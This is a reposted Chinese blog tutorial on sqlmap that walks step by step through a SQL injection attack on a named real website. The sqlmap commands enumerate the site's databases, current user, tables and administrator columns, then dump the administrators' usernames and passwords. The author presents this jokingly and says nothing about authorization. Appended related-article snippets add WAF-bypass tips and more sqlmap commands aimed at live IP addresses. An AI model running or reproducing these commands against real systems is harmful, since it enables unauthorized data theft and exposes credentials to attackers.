转载:sqlmap的应用实战

最新推荐文章于 2024-04-07 10:24:13 发布
最新推荐文章于 2024-04-07 10:24:13 发布
阅读量358 收藏 2
点赞数
原文链接:https://blog.csdn.net/vala0901/article/details/71548954
版权

原文链接:https://blog.csdn.net/vala0901/article/details/71548954

有幸在kali中文网上查看了很多大神写的sqlmap的教程,其中还在大神的文章里找到了一个悲催的网站www.bible-history.com/,所以就按照前人总结,给这个悲催的网站脱裤了。。。。下面详细的讲一下怎么给网站脱裤,啊,不,是拖库。。。。。

1.首先要知道可以注入的网址是什么

    http://www.bible-history.com/subcat.php?id=2

2.接着就可以针对这个网址来检测能不能注入,以及查看它的所有数据库列表了

  sqlmap -u "http://www.bible-history.com/subcat.php?id=2" --dbs  (注意:dbs前面是两个横杠)

 

注入的结果表示:

(1)注入参数id为GET注入,注入类型有四种,分别是:boolean-based blind/error-based/time-based blind/union query

(2)web应用程序技术为:Apache  PHP

(3)数据库类型:MySQL

(4)画红圈的是网址所有的数据库名单

其中可能有你输入[Y/N]的,统统回车解决吧。

 

3.这时,我们发现这个网址存在注入,并且拿到了所有数据库名单。我们决定查看web当前使用的数据库

  sqlmap -u "http://www.bible-history.com/subcat.php?id=2" --current-db

红线画出的就是当前使用的数据库:bible_history,一会我们会针对这个数据库下手。。。

4.探测web数据库使用的账号

  sqlmap -u "http://www.bible-history.com/subcat.php?id=2" --current-user

可见当前的数据库使用账户为:bho@localhost

 

5.下面我们来探测bible_history这个数据库里的所有表

sqlmap -u "http://www.bible-history.com/subcat.php?id=2" -D bible_history --tables

其中:

(1)D指出数据库名字

(2)tables列出表

 

6.下面我想探测的是administrators这个表的列

sqlmap -u "http://www.bible-history.com/subcat.php?id=2" -D bible_history -T administrators --columns

其中:

(1)T指定要列出字段的表

(2)columns列出列

 

7.表中字段明显拿到了。。。。下面一步还用说么?果断脱裤。。。。好开心。。。。

sqlmap -u "http://www.bible-history.com/subcat.php?id=2" -D bible_history -T administrators -C admin_id,admin_username,admin_password --dump

成功!!!

(PS:自从逛了大神技术贴,就再也不能好好说“拖库”了。。。满脑子都是给web脱裤。。。。我天朝的男程序员们就是如此闷骚阔爱)认真脸。。。

sinolzeng
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
<小迪安全>19-SQL注入之sqlmap绕过WAF
hackerXxxt的博客
03-17 797
1.白名单方式一:IP白奖单从网络层获取的ip,这种一般伪造不来,如果是获取客户端的IP,这样就可能存在伪造IP绕过的情况。测试方法:修改http的header来bypass wafx-Real-ip方式二:静态资源特定的静态资源后缀请求,常见的静态文件(.js .jpg .swf .css等等),类似白名单机制,waf为了检测效率,不去检测这样一些静态文件名后缀的请求。id=1id=1备注: Aspx/php只识别到前面的.aspx/.php后面基本不识别。
SqlMap_BurpSuite:SqlMap_BurpSuite
03-10
SqlMap_BurpSuite编译好的sqlmap.jargrep -r“发送到Sqlmap” src/burp/SnifferContextMenuFactory.java: JMenuItem jMenuItem = new JMenuItem("send to Sqlmap"); JMenuItem jMenuItem = new JMenuItem("send to ...
SQLMAP基本应用详解(实战演示)
刘桂香263的博客
07-31 4644
SQLMAP自动化注入工具具有扫描、发现并利用给定的URL的SQL漏洞。
SQLMAP使用教程(四)实战技巧三之绕过防火墙
不秃头的程序Yang
07-06 795
一、查看temper模块 四、设置http请求延时 五、使用代理注入
神器SQLmap实战详解
最新发布
Sgirll的博客
04-07 377
本文将以SQLMap工具为核心,深入探讨SQL注入的原理、检测、利用及防御策略,旨在为网络安全研究人员、渗透测试人员提供实用指南。通过学习和使用像SQLMap这样的工具,我们不仅能够更好地理解SQL注入的原理和攻击手法,还能够加强我们的应用程序和数据库的安全防护。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。SQLMap是一款开源的自动化SQL注入测试工具,它能够检测和利用Web应用中的SQL注入漏洞。
SQLMAP简介及使用方式
weixin_61862241的博客
05-06 9081
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库;基于布尔类型的注入,即可根据返回页面判断条件真假的注入;基于时间的盲注,即不能根据页面返回判断的时候,利用时间线是否延时来判断条件的真假;
sqlmap注入实战教程(图文详解)
weixin_49071539的博客
12-18 2万+
此教程使用靶场实战演示,仅供学习未经授权切勿用于非法用途 ! 1.发现此网址可能存在sql注入漏洞,我们进行sql盲注入测试一下是否存在漏洞。 地址栏输入 and 1=1 发现页面正常显示。 再次输入and 1=2 页面出现错误,说明该页面可能存在sql注入漏洞 2.现在拿出我们的kali工具,sqlmap进行注入测试。 sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs 3.可以看到存在注入漏洞,扫到了5个数据库。要获.
Web应用安全:Sqlmap操作参数介绍.pptx
06-19
Sqlmap操作参数介绍 1 Sqlmap简介 2 Sqlmap的安装 3 Sqlmap操作参数介绍 目录 Sqlmap简介 Sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。 它拥有非常强大的检测引擎、...
Web应用安全:Sqlmap用法介绍.pptx
06-20
Sqlmap用法介绍 搭建phpStudy站点 搭建DVWA 2. Sqlmap SQL注入演示 搭建phpStudy phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可...
Web应用安全:Sqlmap用法介绍(实验).docx
06-20
Sqlmap 用法介绍 一、实验目的 掌握Sqlmap的相关知识; 熟悉Sqlmap工具的使用; 掌握SQL注入的相关知识; 熟悉Web站点的搭建。 二、实验内容 安装Sqlmap; 搭建phpStudy站点并开启apache服务器和MySQL数据库; 在...
安全测试工具:sqlmap,很好用的sql注入测试工具
10-29
1、工具的使用,能让测试的速度提高很多,达到事半功倍的效果; 2、选择高效的工具更是如此,sqlmap,你值得拥有;
SQLmap使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
06-20 3万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
实战sqlmap绕过WAF
zkaqlaoniao的博客
10-26 3879
前言 随着最近几年安全行业的兴起,市场关注度的不断提升,安全防护的软件也在不断提升,不在是那个随便找一个站就能马上发现漏洞了,没有以前那么多所谓的“靶场”了,在这次的实战中遇到的SQL注入与其他的有点不一样,需要考虑的东西很多,写得不好的地方师傅们勿喷。 实战演示 通过前期的信息收集发现存在注入的页面如下: 直接使用sqlmap跑发现出现如下错误: python2 sqlmap.py -u "http://xxxx?&daxxtae=null&parame=xxxxx..
kali之sqlmap应用实战
m0_37422153的博客
03-31 6353
前言 好久没有玩kali,都说kali玩的好,局子进的早,今天打算用sqlmap来获取某个悲催网站的管理员账号和密码,www.bible-history.com这个就是传说中经常被攻击的网站,今天就拿它开刀。 实践 sqlmap工具通常都是用sql自动注入来获取网站管理员密码。点击https://www.bible-history.com/subcat.php这个网址跳转的网站界面如下: 点击ht...
【简单工具】SQLMap十大常用功能浅析(待完善)
Fighting_hawk的博客
01-28 4337
1. 了解SQLMap的主要功能和用法; 2. 后续再结合SQL语句、注入原理分析每个命令的实现过程。
SQLmap简介以及防火墙绕过方法
weixin_30526593的博客
01-23 475
简介 许多现实中对于网站的攻击往往是由于网站没有及时更新或者对于用户的输入没有进行检查。从缓冲区溢出说起,这样一种针对系统脆弱性的威胁,最根本的问题还是在于对于用户的输入没有进行检查。作为主要威胁之一的SQL注入带来了人们对于其应用和数据库的担忧。这个问题的出现有十年的时间了,但是现在仍旧在许多网站中出现。SQL注入就像许多当前主要的的web应用安全攻击问题也被划归在了对于用户输...
sqlmap一次实战
suancai1993的博客
09-11 1875
这是墨者学院一个SQL注入漏洞靶场:http://219.153.49.228:49835/show.php?id=MQo= 【目的是寻找key】 【想练习的可以去墨者学院–>在线靶场–>web安全–>sql注入–>sql注入实战-MySQL】 不启动靶场进不去这个链接 进入网站提示的信息如下图所示: 从这个网页提示信息我们也可以窥视出一些东西: 它使用的数据库类...
sqlmap参数介绍
Jerry____的博客
07-16 1315
如果存在sql注入,获取数据过程 获取数据库 sqlmap -u “http://192.168.120.249/baji/vul/sql/show1.php?id=1” --dbs 获取当前数据库 sqlmap -u “http://192.168.120.249/baji/vul/sql/show1.php?id=1” --current-db 获取数据库中的表 sqlmap -u “http...
pdf:sqlmap使用手册
07-04
SQLMap是一款开源的自动化测试工具,用于测试和利用Web应用程序中可能存在的SQL注入漏洞。本文主要介绍了SQLMap的使用手册。 首先,安装SQLMap。我们可以从官方网站下载最新版本的SQLMap,并将其解压到我们希望存放...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值